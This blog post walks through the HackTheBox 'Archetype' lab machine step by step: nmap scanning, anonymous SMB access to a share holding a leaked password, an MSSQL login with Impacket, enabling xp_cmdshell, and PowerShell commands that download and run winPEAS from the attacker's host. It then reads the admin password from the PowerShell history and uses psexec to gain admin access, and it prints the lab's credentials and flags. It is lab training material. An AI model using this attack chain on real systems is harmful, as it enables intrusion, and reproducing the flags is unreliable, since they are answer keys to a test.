HTB Labs — Tier 2 — “Archetype” Machine Walkthrough | By: CyberAlp0

Mohamed Maher
9 min read · Apr 4, 2024


Hey Folks, this is CyberAlp0, back again with a new walkthrough powered by HTB, Tier 2, named “Archetype”. This machine covers a series of tasks that walk you through finding the flags and solving the machine.

This blog will guide you through solving the tasks one by one and give you a little more information and hints about each question. These hints will widen your experience and sharpen your mind.

Let’s begin Spawning…

Step 1: Connecting to the Starting Point Labs Servers.

To attack the target machine, you have to be on the same network. You can read my blog, which will guide you step by step through connecting to the target machine.

Step 2: Spawning the Machine and Starting to Solve the Tasks.

Task 1: Which TCP port is hosting the database server?

Answer: 1433

Walkthrough:

By scanning the target first, we get a pretty good picture of nearly everything on the machine. Two common scanning tools are Nmap and Rustscan.

Since Nmap is my favorite, I will be using it to see which ports are open and what services are running.

nmap -v 10.129.95.187
Discovering the open ports on the target

You can also run Nmap to detect service versions (-sV) and to run the default set of scripts (-sC).

nmap -sC -sV 10.129.95.187
Discovering the open ports and service versions on the target

You will notice that the database in use is Microsoft SQL Server 2017, and that it is listening on TCP port 1433.

Note that: 1433 is the default TCP port for Microsoft SQL Server; MySQL, by contrast, defaults to TCP port 3306.

Task 2: What is the name of the non-administrative share available over SMB?

Answer: backups

Walkthrough:

Since port 445 is open, the server is running SMB (Server Message Block). If the server permits anonymous (null-session) access, anyone on the network can enumerate its shares, such as shared folders and printers.

To enumerate the shares, we type the following command:

smbclient -L 10.129.95.187
Listing the shares on the server that has port 445 open.

We will notice that there are 4 shares on the server. Shares whose names end with a “$” sign are administrative shares: nobody can access or view their contents without the right permissions. Hence, the only share that can be accessed without a password is the “backups” share.

Note that: a share is a local resource on the server, typically a directory, that is accessible to SMB clients on the network. Shares are commonly used to provide network access to home directories on a file server, where each user is assigned a home directory.

How SMB is exploited

We discussed SMB in more detail in the “DANCE” machine write-up; you may find more information about exploiting SMB in that blog.

Task 3: What is the password identified in the file on the SMB share?

Answer: M3g4c0rp123

Walkthrough:

Making use of the available share named “backups”, we connect to it over port 445 and list its contents with smbclient:

smbclient --no-pass //10.129.95.187/backups
Connecting to the backups share without a password

Using the GET command, we download the file named “prod.dtsconfig”. Viewing the contents of this file reveals the password.

The Password identified in the file prod.dtsconfig

Task 4: What script from Impacket collection can be used to establish an authenticated connection to a Microsoft SQL Server?

Answer: mssqlclient.py

Walkthrough:

First of all, we need to understand what the Impacket collection is. Impacket is a set of scripts and libraries written in Python that provides a wide range of functionality for working with network protocols and for penetration testing.

Impacket was developed by Core Security Technologies. These scripts and libraries allow users to interact with network services and perform security-related tasks, and they implement network protocols such as SMB, LDAP, and Kerberos.

Note that: the Impacket scripts and libraries are open source and can be found on GitHub, and they come preinstalled in recent Kali Linux releases.

In the Impacket collection, the script used to establish an authenticated connection to a Microsoft SQL Server is “mssqlclient.py”. It is a Python script that connects to a Microsoft SQL Server and executes SQL queries.

impacket-mssqlclient <hostname/ID>@IP -windows-auth

You will find the hostname and the username in prod.dtsconfig: the user is ARCHETYPE/sql_svc and the password is M3g4c0rp123.

Connect to the server using the Impacket mssqlclient.py command as follows:

impacket-mssqlclient ARCHETYPE/sql_svc@10.129.138.22 -windows-auth

You will be asked for the password; paste it and press Enter.

Connecting to the Archetype SQL Server with the Impacket script mssqlclient.py

Task 5: What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell?

Answer: xp_cmdshell

Walkthrough:

In Microsoft SQL Server, the extended stored procedure that can be used to spawn a Windows command shell is called “xp_cmdshell”.

What is meant by an extended stored procedure?

It is a feature of Microsoft SQL Server that allows users to create and execute functions. These functions extend the functionality of SQL Server by integrating code written in other languages such as C# and C++.

“xp_cmdshell” is one of these built-in extended stored procedures. It gives you the ability to execute commands at the operating-system level from within SQL Server itself, that is, to interact with the Windows command line (CMD) and run commands.

Bottom line: xp_cmdshell is a stored-procedure feature inside SQL Server. When it is used, it acts as a channel between you and the Windows operating system, and you can run Windows PowerShell commands through it.

How xp_cmdshell works, and how it is exploited by hackers

To make use of xp_cmdshell, you first have to enable the feature; mssqlclient.py provides a helper command for this. Enabling it gives you the ability to execute commands at the OS level.

enable_xp_cmdshell
Enabling xp_cmdshell: its configuration value changes from 0 to 1

To make sure everything works, execute a Windows shell command such as whoami and check the result.

The hacker is now logged in as a normal user.

Task 6: What script can be used to search possible paths to escalate privileges on Windows hosts?

Answer: winPEAS

Walkthrough:

When executing the “whoami” command through xp_cmdshell, we saw that we are logged in as a normal user. Thus, we need to escalate our privileges from a normal user to a more powerful one.

Walkthrough into using winPEAS for escalating privileges:

Firstly: download the Windows Privilege Escalation Awesome Scripts (winPEAS) from GitHub through this link, and install it as shown in the following screenshot.

Installing winPEAS from GitHub

From the release page, through this link, you can download the winPEAS binary that will be transferred to and executed on the target machine.

The file we want to download and transfer to the target machine is winPEASx64.exe

Secondly: Transfer winPEASx64.exe to the target machine

winPEAS.exe is a script that enumerates possible paths to escalate privileges from a normal user to an administrator. Thus, we will move this script to the target machine and execute it there.

After downloading the script with the wget command, we copy it to the web root of the Apache2 server on Kali Linux, which is located at /var/www/html.

Using the wget command to download the winPEAS script.
Copying the script to the /var/www/html Directory and initiating the apache2 server

Now the script can be downloaded by typing the following link in any browser: http://10.10.14.66/winPEASx64.exe

We will use xp_cmdshell to download the script to the target machine via PowerShell, and then use PowerShell to execute it.

Thirdly: Use xp_cmdshell to download the script on the target machine and execute it.

Step 1: Printing the Working Directory

xp_cmdshell "powershell -c pwd"
Printing the working Directory to see where we are in the Windows SQL Server.

Step 2: Listing what’s inside the directory C:/Users/Public

xp_cmdshell "powershell -c dir C:/Users/Public"
This is the path in which we will upload our winPEAS.exe.

Step 3: Downloading the winPEASx64.exe using the PowerShell

xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe"
Downloading the winPEASx64.exe script in the path C:/Users/Public

You will notice the following “NotSupportedException” error:

wget : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.

To get around this, specify an output file for the download with -OutFile, including its extension (in PowerShell, wget is an alias for Invoke-WebRequest, and the short form -o is ambiguous):

xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx64.exe -OutFile winPEASx64.exe"
Defining the output file for the script to overcome the “NotSupportedException” issue.
Listing what’s inside C:/Users/Public to make sure that the script has been downloaded

Step 4: Executing the Script to escalate the privileges “ApplicationFailedException”

Write the following command in order to execute the winPEASx64.exe

xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx64.exe"

You will encounter an error stating that “winPEASx64.exe” is not a valid application for this OS platform. This can be solved by downloading the other version of winPEAS, the x86 build.

Error while executing the winPEASx64 script.

An x86 binary can be executed on both architectures (x64 and x86). You will find the x86 version through this link.

Downloading the x86 exe file of the winPEAS, to be executed in the target machine.

Step 5: Downloading the x86 based script on the target machine

After following the previous steps to download the x86 version of winPEAS, we download the script onto the target machine with the following command:

xp_cmdshell "powershell -c cd C:/Users/Public; wget http://10.10.14.66/winPEASx86.exe -OutFile winPEASx86.exe"
winPEASx86.exe is now downloaded and runs successfully.

Step 6: Executing the x86-based script on the target machine

Type the following command to execute winPEASx86.exe on the target machine and look for privilege-escalation paths. You can see the result of the execution in the previous screenshot.

xp_cmdshell "powershell -c cd C:/Users/Public; ./winPEASx86.exe"
Result of the command execution

We find that the path of the file containing the administrator password is:

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.

Task 7: What file contains the administrator’s password?

Answer: ConsoleHost_history.txt

Walkthrough:

By typing the following command, we list the contents of the text file that contains the admin’s password:

xp_cmdshell "powershell -c cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\; type ConsoleHost_history.txt"

Or we can type the following directly:

xp_cmdshell "powershell -c type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
The type command is the Windows equivalent of cat on Linux

The password of the admin is MEGACORP_4dm1n!!
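As an added defender's example (not part of the original post), the following Python scanner flags both credential exposures this walkthrough relies on: a Password= key inside a .dtsconfig connection string (Task 3) and a net use command with an inline password in ConsoleHost_history.txt (Task 7). The file contents are constructed samples modelled on the files described above, not the machine's real files, and reported secrets are redacted so the report does not re-leak them.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: an SSIS package configuration holding a connection string.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

# Constructed sample: a PSReadLine history with a password passed on the command line.
SAMPLE_HISTORY = """net.exe use T: \\\\Archetype\\backups /user:administrator MEGACORP_4dm1n!!
dir C:\\Users\\Public
exit"""

def redact(secret):
    """Keep the first two characters only, so the finding never reveals the value."""
    return secret[:2] + "*" * (len(secret) - 2)

def scan_dtsconfig(xml_text):
    """Return (property path, redacted password) for every ConfiguredValue
    whose connection string contains a Password= key."""
    findings = []
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        value = cfg.findtext("ConfiguredValue") or ""
        # Connection strings are ';'-separated key=value pairs.
        for key, val in (kv.split("=", 1) for kv in value.split(";") if "=" in kv):
            if key.strip().lower() == "password":
                findings.append((cfg.get("Path"), redact(val.strip())))
    return findings

# `net use <drive> <share> /user:<name> <password>`: the last token is the password.
NET_USE = re.compile(r"net(?:\.exe)?\s+use\s+\S+\s+\S+\s+/user:(\S+)\s+(\S+)", re.I)

def scan_history(history_text):
    """Return (line number, user, redacted password) for each history line that
    passes a credential on the command line."""
    findings = []
    for n, line in enumerate(history_text.splitlines(), 1):
        m = NET_USE.search(line)
        if m:
            findings.append((n, m.group(1), redact(m.group(2))))
    return findings

if __name__ == "__main__":
    print(scan_dtsconfig(SAMPLE_DTSCONFIG))
    print(scan_history(SAMPLE_HISTORY))
```

Run against a mounted share or a user profile directory, the two functions give a defender the same two findings the walkthrough obtains by hand.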

Task 8: Submitting the user flag

Answer: 3e7b102e78218e935bf3f4951fec21a3

Walkthrough:

Again, we will get help from Impacket: we use a specific Python tool called “psexec.py” to gain access as the administrator and read the user flag.

impacket-psexec Administrator@10.129.70.21
The IP of the machine is different as I restarted the machine

Navigate to the following path to read the user flag:

type C:/Users/sql_svc/Desktop/user.txt

You will find user.txt; once you type it, you will see that the user flag is

3e7b102e78218e935bf3f4951fec21a3

Task 9: Submitting the root flag

Answer: b91ccec3305e98240082d4474b848528

Walkthrough:

You will find the root flag on the administrator's Desktop, at the following path: C:\Users\Administrator\Desktop\root.txt

The User and the Root Flag

The Root Flag of the Archetype Machine is: b91ccec3305e98240082d4474b848528

Hope you enjoyed reading my blog about solving the Archetype machine from HTB — Tier 2 — Starting Point Phase.

See You in another write-up!
